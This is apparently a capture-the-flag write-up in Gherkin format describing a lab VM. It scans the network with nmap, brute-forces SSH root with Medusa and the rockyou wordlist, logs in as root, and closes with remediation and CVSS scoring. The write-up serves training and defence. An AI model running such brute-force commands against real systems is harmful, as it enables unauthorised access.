## Version 1.4.1
## language: en

Feature:
  TOE:
    linesc
  Category:
    Brute Force Attack
  Location:
    172.16.33.129:22 TCP
  CWE:
    CWE-307: Improper Restriction of Excessive Authentication Attempts
  Rule:
    REQ.033: https://fluidattacks.com/products/rules/list/033
  Goal:
    Get remote connection and root privileges
  Recommendation:
    Avoid using weak passwords and enabling root account access through SSH
    only for a specific IP address.

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | Medusa                     | 2.2      |
    | Nmap                       | 7.91     |

  TOE information:
    Given a .OVF file
    When I saw its extension
    Then I executed it on vmware
    Then I saw that the machine was running Ubuntu 8.04.4
    And it was requesting an user as it's shown in [evidence] (01.png)
    Then I verified which IP was assigned to me by dhcp server with the command
    """
    ip addr show vmnet1
    """
    And I got the next output
    """
    vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state
    UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
    inet 172.16.33.1/24 brd 172.16.33.255 scope global vmnet1
    valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:1/64 scope link
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 172.16.33.0/24
    """
    And the command showed me the next result
    """
    Nmap scan report for 172.16.33.1
    Host is up (0.00021s latency).
    Nmap scan report for 172.16.33.129
    Host is up (0.00053s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 2.57 seconds
    """
    When I analyzed the previous commands output
    Then I knew that 172.16.33.129 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -A 172.16.33.129
    """
    Then I got the next result
    """
    Nmap scan report for 172.16.33.129
    Host is up (0.0012s latency).
    Not shown: 997 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu3 (protocol 2.0)
    | ssh-hostkey:
    |   1024 75:51:bc:56:37:e3:ff:6c:dc:7e:61:eb:0f:ef:0f:ba (DSA)
    |_  2048 a6:89:c0:d1:b1:33:0e:3c:85:cb:7c:78:17:b2:17:b8 (RSA)
    111/tcp  open  rpcbind 2 (RPC #100000)
    | rpcinfo:
    |   program version    port/proto  service
    |   100000  2            111/tcp   rpcbind
    |   100000  2            111/udp   rpcbind
    |   100003  2,3,4       2049/tcp   nfs
    |   100003  2,3,4       2049/udp   nfs
    |   100005  1,2,3      32911/tcp   mountd
    |   100005  1,2,3      57290/udp   mountd
    |   100021  1,3,4      34559/udp   nlockmgr
    |   100021  1,3,4      54434/tcp   nlockmgr
    |   100024  1          40383/tcp   status
    |_  100024  1          44885/udp   status
    2049/tcp open  nfs     2-4 (RPC #100003)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    """
    When I appreciated the scan result
    Then I saw that the port 22 was running SSH in its version OpenSSH 4.7p1
    And RCPBIND was using version 2 on port 111
    And NFS was used in its version 2-4 on port 2049

  Scenario: Normal use case
    Given SSH service was working on port 22
    Then I try to access to that port with the next command
    """
    ssh root@172.16.33.129
    """
    Then the system request me for a password [evidence] (02.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given the information previously found
    When I analyzed it in detail
    Then I decided to try a brute force attack through SSH using Medusa
    Then I executed the next command for that
    """
    medusa -h 172.16.33.129 -u root -P /usr/share/wordlists/rockyou.txt
    -M ssh -f -v 6
    """
    And thus I got the found the password for the root user [evidence] (03.png)

  Scenario: Exploitation
    Given I'd previously found the root user's password
    Then I executed the next command to access through SSH to the target system
    """
    ssh root@172.16.33.129
    """
    Then I got a successful login
    Then I executed the command
    """
    whoami
    """
    And Thus I checked that I was logged as the root user
    And I knew that I solved the challenge as it's shown in [evidence] (04.png)

  Scenario: Remediation
    Given the system vulnerable to a brute force attack through SSH
    And management passwords are weak
    Then it'd better enable the SSH root access only for an specific IP address
    And thus avoid that an user can access to that account form any IP
    And establish good password policies to have strong passwords

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     7.1/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.2/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.6/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-03-01
